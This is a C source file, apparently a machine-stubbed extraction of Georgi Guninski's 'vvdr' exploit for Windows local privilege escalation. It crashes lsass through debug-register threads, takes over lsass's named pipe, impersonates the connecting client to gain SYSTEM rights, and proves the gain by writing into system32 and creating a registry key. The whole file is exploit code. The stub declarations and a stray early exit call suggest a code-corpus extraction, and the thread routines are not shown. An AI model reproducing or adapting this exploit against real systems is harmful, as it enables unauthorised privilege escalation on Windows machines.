
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int HKEY ;
typedef scalar_t__ HANDLE ;
typedef int FILE ;
typedef int DWORD ;


 int CloseHandle (scalar_t__) ;
 int ConnectNamedPipe (scalar_t__,int *) ;
 scalar_t__ CreateNamedPipe (char*,int ,int,int,int ,int ,int ,int *) ;
 int CreateThread (int ,int ,int *,int *,int ,int ) ;
 int GetUserName (char*,int*) ;
 int HKEY_CLASSES_ROOT ;
 scalar_t__ INVALID_HANDLE_VALUE ;
 int ImpersonateNamedPipeClient (scalar_t__) ;
 int MAGICESPINLSA ;
 int PIPE_ACCESS_DUPLEX ;
 int PIPE_TYPE_MESSAGE ;
 int PIPE_WAIT ;
 int REG_DWORD ;
 int ReadFile (scalar_t__,void*,int,int*,int *) ;
 int RegCloseKey (int ) ;
 int RegCreateKey (int ,char*,int *) ;
 int atoi (char*) ;
 int exit (int ) ;
 int fclose (int *) ;
 int fflush (int ) ;
 int * fopen (char*,char*) ;
 int fprintf (int *,char*) ;
 int lsadied ;
 int lsasspid ;
 int printf (char*,...) ;
 int sscanf (char*,char*,int*) ;
 int stdout ;
 char* szPipe ;
 int threaddeb ;
 int threadlock ;
 int threadwriter ;
 int waitlsadie ;

int main(int argc,char* argv[])
    {
      DWORD dwType = REG_DWORD;
      DWORD dwSize = sizeof(DWORD);
   DWORD dwNumber = 0;
      char szUser[256];

 exit(0);
      HANDLE hPipe = 0;

  if (argc > 1)
   lsasspid=atoi(argv[1]);
  if (argc > 2)
   sscanf(argv[2],"%x",&MAGICESPINLSA);

   printf("Fun with debug registers. Written by Georgi Guninski\n");
   printf("vvdr started: lsasspid=%d breakp=%x\n",lsasspid,MAGICESPINLSA);
      CreateThread(0, 0, &threadwriter, ((void*)0), 0, 0);
   CreateThread(0, 0, &waitlsadie, ((void*)0), 0, 0);
   CreateThread(0, 0, &threaddeb, ((void*)0), 0, 0);

     while(!lsadied);

      printf("start %s\n",szPipe);
      hPipe = CreateNamedPipe (szPipe, PIPE_ACCESS_DUPLEX,
                               PIPE_TYPE_MESSAGE|PIPE_WAIT,
                               2, 0, 0, 0, ((void*)0));
      if (hPipe == INVALID_HANDLE_VALUE)
      {
        printf ("Failed to create named pipe:\n  %s\n", szPipe);
        return 3;
      }
   CreateThread(0, 0, &threadlock, ((void*)0), 0, 0);
   ConnectNamedPipe (hPipe, ((void*)0));
      if (!ReadFile (hPipe, (void *) &dwNumber, 4, &dwSize, ((void*)0)))
      {
        printf ("Failed to read the named pipe.\n");
        CloseHandle(hPipe);
        return 4;
      }

     if (!ImpersonateNamedPipeClient (hPipe))
      {
        printf ("Failed to impersonate the named pipe.\n");
        CloseHandle(hPipe);
        return 5;
      }
      dwSize = 256;
      GetUserName(szUser, &dwSize);
      printf ("Impersonating dummy :) : %s\n\n\n\n", szUser);

   FILE *f1;
   f1=fopen("c:\\winnt\\system32\\vv1.vv","a");
  if (f1 != ((void*)0))
  {
   fprintf(f1,"lsass worked\n");
   fclose(f1);
   printf("\n%s\n","Done!");
  }
  else
   printf("error creating file");
 fflush(stdout);
 HKEY mykey;
 RegCreateKey(HKEY_CLASSES_ROOT,"vv",&mykey);
 RegCloseKey(mykey);


    CloseHandle(hPipe);
    return 0;
    }
